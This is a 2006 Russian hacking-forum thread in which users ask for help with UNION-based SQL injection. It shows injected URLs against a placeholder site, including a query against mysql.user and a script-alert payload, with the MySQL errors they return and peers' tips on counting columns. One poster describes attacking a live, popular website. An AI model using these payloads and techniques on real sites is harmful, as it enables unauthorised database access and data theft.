Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
01.10.2006, 02:15
|
|
Новичок
Регистрация: 28.09.2005
Сообщений: 29
Провел на форуме:
64232
Репутация:
0
|
|
SQL Injection Help
Zdarova
nu mne intiresna ia sastavlaiu SQL zapros
nu sperva test
1.http://site.ze/cat.php?c=-1'A
Atvet :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'A ORDER BY `ID` DESC LIMIT 1' at line 1
___________________________________ ____________
2.http://site.ze/cat.php?c=-1+union+se...ase(),null,7,8 ,9+from+mysql.user+where+id=1/*
Atvet:Cannot query the database.
Access denied for user 'top'@'localhost' to database 'mysql'
___________________________________ ___________
3.http://site.ze/cat.php?c=-1+union+select+1,2,<script>alert(); </script>,null,5,null,7,8,9+from+mysq l.user+where+id=1/*
Rabotait
___________________________________ ______________
4.http://site.ze/cat.php?c=-1+union+se...,7,8%20%20,9/*
ATVET:Cannot query the database.
The used SELECT statements have a different number of columns
___________________________________ ______________________
Shto mne shas delat
?
Prashu abisnite
|
|
|
01.10.2006, 09:26
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
вообще при наличии ORDER BY `ID` DESC LIMIT 1' at line 1 у тебя не должно ничего работать вообще =)
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
01.10.2006, 09:37
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
Сообщение от blackybr
вообще при наличии ORDER BY `ID` DESC LIMIT 1' at line 1 у тебя не должно ничего работать вообще =)
Ордер бай идет после места инъекции.
|
|
|
|
01.10.2006, 09:50
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
не заметил..
насчет 2го - часто к mysql имеет доступ либо root либо какой-ниб привелигированный юзер.. поэтому ищи поля бд которая доступна именно тебе
насчет 4го - напиши полностью 4ый запрос в тэгах код, но вообще в ошибке и так сказанно что не то число столбцов
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
01.10.2006, 13:13
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
Сообщение от netadmin
___________
3.http://site.ze/cat.php?c=-1+union+select+1,2,<script>alert(); </script>,null,5,null,7,8,9+from+mysq l.user+where+id=1/*
Rabotait
___________________________________ ______________
4.http://site.ze/cat.php?c=-1+union+se...,7,8%20%20,9/*
ATVET:Cannot query the database.
The used SELECT statements have a different number of columns
Мне вот это странно, что 3 работает, т.к. там нету ковычек, это что получается такая колонка есть.
А в 4 ясно написано что кол-во колонок не совпадает.
|
|
|
|
01.10.2006, 16:00
|
|
Новичок
Регистрация: 28.09.2005
Сообщений: 29
Провел на форуме:
64232
Репутация:
0
|
|
karoche nechivo ne vixodit da  |
|
|
|
01.10.2006, 16:57
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
давай пример. чем сможем тем поможем =))
стихи прямо..
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
02.10.2006, 02:10
|
|
Познающий
Регистрация: 03.05.2006
Сообщений: 82
Провел на форуме:
219818
Репутация:
10
|
|
Есть похожая тема. Нашел инекцию в очень раскрученном ресурсе. Параметр передается походу двум запросам, один на 5 столбцов, другой на 8. И не понятно, почему точка с запятой приводят к ошибке в любом месте, и после параметра и в Union запросе. Вот примеры.
1. =0;/*
Query Error!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';/*' at line 1Query Error!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';/*' at line 1
2. =0 union select null, null, null, null, null/*
Query Error!
The used SELECT statements have a different number of columns
3. =0 union select null, null, null, null, VERSION()/*
Query Error!
The used SELECT statements have a different number of columns
Если сломаю, с меня адресок ресурса  |
|
|
|
02.10.2006, 03:04
|
|
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324
Репутация:
92
|
|
Если сломаю, с меня адресок ресурса
всю жизнь мечтали )))
посмотри сколько точно столбцов участвует в запросе, при помощи order by
|
|
|
|
02.10.2006, 19:08
|
|
Познающий
Регистрация: 03.05.2006
Сообщений: 82
Провел на форуме:
219818
Репутация:
10
|
|
В смысле, сколько участвует? На странице должно выводится два запроса с этим параметром, т.е. в одном из них должно быть 5 столбцов, ниже на стр второй с этим же параметром, но 8 столбцов. Возможно это даже разные таблицы. Дело в том, что при выборе например 4 столбцов выводятся два сообщения об ошибке и неправильном количестве столбцов, при выборе 5 или 8 только одно. Соответсвенно, в любом случае при запросе я получаю ошибку или от одного или от другого. Можно ли это исправить?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
